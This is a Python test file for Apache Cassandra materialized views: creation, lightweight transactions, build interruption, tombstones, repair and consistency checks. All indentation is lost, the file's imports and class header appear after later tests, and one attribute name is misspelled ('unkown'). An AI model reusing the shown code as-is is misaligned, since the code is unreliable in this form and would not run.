Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
@expected_result The new column is not present in the view.
"""
session = self.prepare(user_table=True)
session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT username FROM users "
"WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
self.assertEqual(len(results), 1)
self.assertFalse(hasattr(results[0], 'first_name'), 'Column "first_name" found in view')
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
def lwt_test(self):
"""Test that lightweight transaction behave properly with a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
debug("Inserting initial data using IF NOT EXISTS")
for i in xrange(1000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
self._replay_batchlogs()
debug("All rows should have been inserted")
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
debug("Tyring to UpInsert data with a different value using IF NOT EXISTS")
for i in xrange(1000):
v = i * 2
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
)
self._replay_batchlogs()
debug("No rows should have changed")
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
debug("Update the 10 first rows with a different value")
for i in xrange(1000):
v = i + 2000
session.execute(
"UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
)
self._replay_batchlogs()
debug("Verify that only the 10 first rows changed.")
results = list(session.execute("SELECT * FROM t_by_v;"))
self.assertEqual(len(results), 1000)
for i in xrange(1000):
v = i + 2000 if i < 10 else i
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(v),
[v, i, 'a', 3.0]
)
debug("Deleting the first 10 rows")
for i in xrange(1000):
v = i + 2000
session.execute(
"DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
)
self._replay_batchlogs()
debug("Verify that only the 10 first rows have been deleted.")
results = list(session.execute("SELECT * FROM t_by_v;"))
self.assertEqual(len(results), 990)
for i in xrange(10, 1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
def interrupt_build_process_test(self):
"""Test that an interupted MV build process is resumed as it should"""
session = self.prepare(options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
debug("Inserting initial data")
for i in xrange(10000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
debug("Stop the cluster. Interrupt the MV build process.")
self.cluster.stop()
debug("Restart the cluster")
self.cluster.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node1)
session.execute("USE ks")
debug("MV shouldn't be built yet.")
assert_none(session, "SELECT * FROM t_by_v WHERE v=10000;")
debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
start = time.time()
while True:
try:
result = list(session.execute("SELECT count(*) FROM t_by_v;"))
self.assertNotEqual(result[0].count, 10000)
except AssertionError:
debug("MV build process is finished")
break
elapsed = (time.time() - start) / 60
if elapsed > 2:
break
time.sleep(5)
debug("Verify all data")
result = list(session.execute("SELECT count(*) FROM t_by_v;"))
self.assertEqual(result[0].count, 10000)
for i in xrange(10000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
def view_tombstone_test(self):
"""
Test that a materialized views properly tombstone
@jira_ticket CASSANDRA-10261
@jira_ticket CASSANDRA-10910
"""
self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.max_trace_wait = 120
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=0, verify
session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
consistency_level=ConsistencyLevel.ALL))
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'a', 3.0]
)
session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
consistency_level=ConsistencyLevel.ALL))
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
# change v's value and TS=3, tombstones v=1 and adds v=0 record
session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
consistency_level=ConsistencyLevel.ALL))
assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
debug('Shutdown node2')
node2.stop(wait_other_notice=True)
session.execute("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1")
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
node2.start(wait_other_notice=True, wait_for_binary_proto=True)
# We should get a digest mismatch
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
# We should not get a digest mismatch the second time
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
# Verify values one last time
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0],
cl=ConsistencyLevel.ALL
)
def check_trace_events(self, trace, expect_digest):
# we should see multiple requests get enqueued prior to index scan
# execution happening
# Look for messages like:
# Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
regex = r"Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey"
for event in trace.events:
desc = event.description
match = re.match(regex, desc)
if match:
if expect_digest:
break
else:
self.fail("Encountered digest mismatch when we shouldn't")
else:
if expect_digest:
self.fail("Didn't find digest mismatch")
def simple_repair_test(self):
"""
Test that a materialized view are consistent after a simple repair.
"""
session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
debug('Shutdown node2')
node2.stop(wait_other_notice=True)
for i in xrange(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
debug('Verify the data in the MV with CL=ONE')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
for i in xrange(1000):
statement = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
assert_unavailable(
session.execute,
statement
)
debug('Start node2, and repair')
node2.start(wait_other_notice=True, wait_for_binary_proto=True)
node1.repair()
debug('Verify the data in the MV with CL=ONE. All should be available now.')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ONE
)
def base_replica_repair_test(self):
"""
Test that a materialized view are consistent after the repair of the base replica.
"""
self.prepare(rf=3)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
debug('Write initial data')
for i in xrange(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
debug('Verify the data in the MV with CL=ALL')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
debug('Shutdown node1')
node1.stop(wait_other_notice=True)
debug('Delete node1 data')
node1.clear(clear_all=True)
debug('Restarting node1')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
debug('Verify that there is no data on node1')
for i in xrange(1000):
assert_none(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i)
)
debug('Restarting node2 and node3')
node2.start(wait_other_notice=True, wait_for_binary_proto=True)
node3.start(wait_other_notice=True, wait_for_binary_proto=True)
# Just repair the base replica
node1.nodetool("repair ks t")
debug('Verify data with cl=ALL')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
def complex_repair_test(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
"WITH gc_grace_seconds = 5")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
debug('Shutdown node2 and node3')
node2.stop()
node3.stop(wait_other_notice=True)
debug('Write initial data to node1 (will be replicated to node4 and node5)')
for i in xrange(1000):
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
debug('Verify the data in the MV on node1 with CL=ONE')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_other_notice=True, wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
for i in xrange(1000):
assert_none(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
)
debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
for i in xrange(1000):
# we write i*2 as value, instead of i
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
debug('Verify the new data in the MV on node2 with CL=ONE')
for i in xrange(1000):
v = i * 2
assert_one(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0]
)
debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
debug('Start remaining nodes')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
node4.start(wait_other_notice=True, wait_for_binary_proto=True)
node5.start(wait_other_notice=True, wait_for_binary_proto=True)
session = self.patient_cql_connection(node1)
debug('Read data from MV at QUORUM (old data should be returned)')
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
debug('Run global repair on node1')
node1.repair()
debug('Read data from MV at quorum (new data should be returned after repair)')
for i in xrange(1000):
v = i * 2
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
def really_complex_repair_test(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
"WITH gc_grace_seconds = 1")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
"v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
self._replay_batchlogs()
debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
self._replay_batchlogs()
debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
session.shutdown()
debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_other_notice=True, wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
session2.execute('USE ks')
debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")
debug('Write new data in node2 that overlap those in node1')
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])
debug("Composite delete of everything")
session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
self._replay_batchlogs()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")
debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
debug('Start remaining nodes')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
node4.start(wait_other_notice=True, wait_for_binary_proto=True)
node5.start(wait_other_notice=True, wait_for_binary_proto=True)
# at this point the data isn't repaired so we have an inconsistency.
# this value should return None
assert_all(
session2,
"SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
cl=ConsistencyLevel.QUORUM
)
debug('Run global repair on node1')
node1.repair()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def complex_mv_select_statements_test(self):
"""
Test complex MV select statements
@jira_ticket CASSANDRA-9664
"""
cluster = self.cluster
cluster.populate(3).start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1)
debug("Creating keyspace")
session.execute("CREATE KEYSPACE mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
session.execute('USE mvtest')
mv_primary_keys = ["((a, b), c)",
"((b, a), c)",
"(a, b, c)",
"(c, b, a)",
"((c, a), b)"]
for mv_primary_key in mv_primary_keys:
session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")
insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
session.cluster.control_connection.wait_for_schema_agreement()
rows = [(0, 0, 0, 0),
(0, 0, 1, 0),
(0, 1, 0, 0),
(0, 1, 1, 0),
(1, 0, 0, 0),
(1, 0, 1, 0),
(1, 1, -1, 0),
(1, 1, 0, 0),
(1, 1, 1, 0)]
for row in rows:
session.execute(insert_stmt, row)
debug("Testing MV primary key: {}".format(mv_primary_key))
session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
"a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
time.sleep(3)
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new rows that does not match the filter
session.execute(insert_stmt, (0, 0, 1, 0))
session.execute(insert_stmt, (1, 1, 0, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new row that does match the filter
session.execute(insert_stmt, (1, 2, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update rows that does not match the filter
session.execute(update_stmt, (1, 1, -1, 0))
session.execute(update_stmt, (0, 1, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update a row that does match the filter
session.execute(update_stmt, (2, 1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete rows that does not match the filter
session.execute(delete_stmt1, (1, 1, -1))
session.execute(delete_stmt1, (2, 0, 1))
session.execute(delete_stmt2, (0,))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a row that does match the filter
session.execute(delete_stmt1, (1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a partition that matches the filter
session.execute(delete_stmt2, (1,))
assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)
# Cleanup
session.execute("DROP MATERIALIZED VIEW mv")
session.execute("DROP TABLE test")
# For read verification
class MutationPresence(Enum):
match = 1
extra = 2
missing = 3
excluded = 4
unknown = 5
class MM(object):
mp = None
def out(self):
pass
class Match(MM):
def __init__(self):
self.mp = MutationPresence.match
def out(self):
return None
class Extra(MM):
expecting = None
value = None
row = None
def __init__(self, expecting, value, row):
self.mp = MutationPresence.extra
self.expecting = expecting
self.value = value
self.row = row
def out(self):
return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
value = None
row = None
def __init__(self, value, row):
self.mp = MutationPresence.missing
self.value = value
self.row = row
def out(self):
return "Missing. At {}".format(self.row)
class Excluded(MM):
def __init__(self):
self.mp = MutationPresence.excluded
def out(self):
return None
class Unknown(MM):
def __init__(self):
self.mp = MutationPresence.unknown
def out(self):
return None
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
return SimpleRow(a=i % num_partitions, b=(i % 400) / num_partitions, c=i, d=i)
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
def execute_query(session, select_gi, i):
row = row_generate(i, num_partitions)
if (row.a, row.b) in rows:
base = rows[(row.a, row.b)]
else:
base = -1
gi = list(session.execute(select_gi, [row.c, row.a]))
if base == i and len(gi) == 1:
return Match()
elif base != i and len(gi) == 1:
return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
elif base == i and len(gi) == 0:
return Missing(base, i)
elif base != i and len(gi) == 0:
return Excluded()
else:
return Unknown()
try:
cluster = Cluster([ip])
session = cluster.connect()
select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
select_gi.consistency_level = readConsistency
for i in range(start, end):
ret = execute_query(session, select_gi, i)
queue.put_nowait(ret)
except Exception as e:
print str(e)
queue.close()
@since('3.0')
@skipIf(sys.platform == 'win32', 'Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
def prepare(self, user_table=False):
cluster = self.cluster
cluster.populate(3).start()
node2 = cluster.nodelist()[1]
# Keep the status of async requests
self.exception_type = collections.Counter()
self.num_request_done = 0
self.counts = {}
for mp in MutationPresence:
self.counts[mp] = 0
self.rows = {}
self.update_stats_every = 100
debug("Set to talk to node 2")
self.session = self.patient_cql_connection(node2)
return self.session
def _print_write_status(self, row):
output = "\r{}".format(row)
for key in self.exception_type.keys():
output = "{} ({}: {})".format(output, key, self.exception_type[key])
sys.stdout.write(output)
sys.stdout.flush()
def _print_read_status(self, row):
if self.counts[MutationPresence.unknown] == 0:
sys.stdout.write(
"\rOn {}; match: {}; extra: {}; missing: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing])
)
else:
sys.stdout.write(
"\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing],
self.counts[MutationPresence.unkown])
)
sys.stdout.flush()
def _do_row(self, insert_stmt, i, num_partitions):
# Error callback for async requests
def handle_errors(row, exc):
self.num_request_done += 1
try:
name = type(exc).__name__
self.exception_type[name] += 1
except Exception as e:
print traceback.format_exception_only(type(e), e)
# Success callback for async requests
def success_callback(row):
self.num_request_done += 1
if i % self.update_stats_every == 0:
self._print_write_status(i)
row = row_generate(i, num_partitions)
async = self.session.execute_async(insert_stmt, row)
errors = partial(handle_errors, row)
async.add_callbacks(success_callback, errors)
def _populate_rows(self):
statement = SimpleStatement(
"SELECT a, b, c FROM mvtest.test1",
consistency_level=readConsistency
)
data = self.session.execute(statement)
for row in data:
self.rows[(row.a, row.b)] = row.c
def single_partition_consistent_reads_after_write_test(self):
"""
Tests consistency of multiple writes to a single partition
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(1)
def multi_partition_consistent_reads_after_write_test(self):
"""
Tests consistency of multiple writes to a multiple partitions
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(20)
def _consistent_reads_after_write_test(self, num_partitions):
session = self.prepare()
[node1, node2, node3] = self.cluster.nodelist()
# Test config
lower = 0
upper = 100000
processes = 4
queues = [None] * processes
eachProcess = (upper - lower) / processes
debug("Creating schema")
session.execute(
("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
)
session.execute(
"CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
)
session.cluster.control_connection.wait_for_schema_agreement()
insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
insert1.consistency_level = writeConsistency
debug("Writing data to base table")
for i in range(upper / 10):
self._do_row(insert1, i, num_partitions)
debug("Creating materialized view")
session.execute(
('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
'c IS NOT NULL PRIMARY KEY (c,a,b)')
)
session.cluster.control_connection.wait_for_schema_agreement()
debug("Writing more data to base table")
for i in range(upper / 10, upper):
self._do_row(insert1, i, num_partitions)
# Wait that all requests are done
while self.num_request_done < upper:
time.sleep(1)
debug("Making sure all batchlogs are replayed on node1")
node1.nodetool("replaybatchlog")
debug("Making sure all batchlogs are replayed on node2")
node2.nodetool("replaybatchlog")
debug("Making sure all batchlogs are replayed on node3")
node3.nodetool("replaybatchlog")
debug("Finished writes, now verifying reads")
self._populate_rows()
for i in range(processes):
start = lower + (eachProcess * i)
if i == processes - 1:
end = upper
else:
end = lower + (eachProcess * (i + 1))
q = Queue()
node_ip = self.get_ip_from_node(node2)
p = Process(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
p.start()
queues[i] = q
for i in range(lower, upper):
if i % 100 == 0:
self._print_read_status(i)
mm = queues[i % processes].get()
if not mm.out() is None:
sys.stdout.write("\r{}\n" .format(mm.out()))
self.counts[mm.mp] += 1
self._print_read_status(upper)
sys.stdout.write("\n")
sys.stdout.flush()
known failure
materialized_views_test.TestMaterializedViews.view_tombstone_test
import collections
import re
import sys
import time
import traceback
from functools import partial
from multiprocessing import Process, Queue
from unittest import skipIf
# TODO add in requirements.txt
from enum import Enum # Remove when switching to py3
from assertions import (assert_all, assert_crc_check_chance_equal,
assert_invalid, assert_none, assert_one,
assert_unavailable)
from cassandra import ConsistencyLevel
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from dtest import Tester, debug
from tools import known_failure, new_node, since
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
def prepare(self, user_table=False, rf=1, options=None, nodes=3):
cluster = self.cluster
cluster.populate([nodes, 0])
if options:
cluster.set_configuration_options(values=options)
cluster.start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1)
self.create_ks(session, 'ks', rf)
if user_table:
session.execute(
("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username));")
)
# create a materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)"))
return session
def _insert_data(self, session):
# insert data
insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
def _replay_batchlogs(self):
debug("Replaying batchlog on all nodes")
for node in self.cluster.nodelist():
if node.is_running():
node.nodetool("replaybatchlog")
def create_test(self):
"""Test the materialized view creation"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 1, "Expecting 1 materialized view, got" + str(result))
def test_gcgs_validation(self):
"""Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
session = self.prepare(user_table=True)
# Shouldn't be able to alter the gc_grace_seconds of the base table to 0
assert_invalid(session,
"ALTER TABLE users WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of the base table of a materialized view "
"to 0, since this value is used to TTL undelivered updates. Setting "
"gc_grace_seconds too low might cause undelivered updates to expire "
"before being replayed.")
# But can alter the gc_grace_seconds of the bease table to a value != 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")
# Shouldn't be able to alter the gc_grace_seconds of the MV to 0
assert_invalid(session,
"ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of a materialized view to 0, since "
"this value is used to TTL undelivered updates. Setting gc_grace_seconds "
